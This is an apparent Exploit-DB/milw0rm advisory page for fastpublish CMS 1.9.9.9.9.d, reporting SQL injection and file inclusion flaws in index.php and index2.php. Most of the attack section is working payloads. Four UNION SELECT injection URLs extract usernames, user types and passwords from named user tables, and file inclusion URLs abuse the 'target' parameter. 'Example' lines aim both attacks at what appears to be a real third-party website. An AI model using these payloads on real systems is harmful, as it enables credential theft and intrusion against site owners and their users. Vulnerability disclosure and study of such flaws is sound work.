fastpublish CMS SQL Injection and File Inclusion Vulnerabilities

vendor:

fastpublish CMS

by:

~!Dok_tOR!~

8.8

CVSS

HIGH

SQL Injection and File Inclusion

89, 22

CWE

Product Name: fastpublish CMS

Affected Version From: 1.9.9.9.9.d

Affected Version To: 1.9.9.9.9.d

Patch Exists: YES

Related CWE: N/A

CPE: a:fastpublish:fastpublish_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

fastpublish CMS SQL Injection and File Inclusion Vulnerabilities

fastpublish CMS version 1.9.9.9.9.d is vulnerable to SQL Injection and File Inclusion. An attacker can exploit this vulnerability by sending malicious SQL queries and file inclusion requests to the vulnerable application. The malicious SQL queries can be sent via the 'q' and 'sprache' parameters in the 'index2.php' script. The malicious file inclusion requests can be sent via the 'artikel' and 'target' parameters in the 'index2.php' and 'index.php' scripts.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: fastpublish CMS
Version: 1.9.9.9.9.d
URL: www.fastpublish.de
Download: http://www.fastpublish.de/rich_files/attachments/downloads/fastpublish_19999d_trial.zip
Vulnerability Class: SQL Injection

SQL Injection

Exploit 1:

http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forumen_userdata/*

Exploit 2:

http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type,user_name,user_pw),7,8,9,10+from+fastpublish__forum_de_userdata/*

Exploit 3:

http://localhost/[installdir]/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,benutzer,passwortm,email),7,8,9,10+from+fastpublish_benutzer/*

Exploit 4:

http://localhost/[installdir]/index.php?artikel=-1+union+select+1,2,concat_ws(0x3a,user_type,user_name,user_pw),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+fastpublish__forumen_userdata/*

Example:

http://www.jeremias-d-meissner.de/index2.php?q=dok&sprache=-1'+union+select+1,2,3,4,5,concat_ws(0x3a,user_type  ,user_name,user_pw),7,8,9,10+from+fastpublish__for  um_de_userdata/*

File inclusion

http://localhost/index2.php?artikel=3&target=./[file]

http://localhost/index.php?artikel=2&target=./[file]

Example:

http://www.jeremias-d-meissner.de/index2.php?artikel=3&target=./forgotpassword.php

# milw0rm.com [2008-10-05]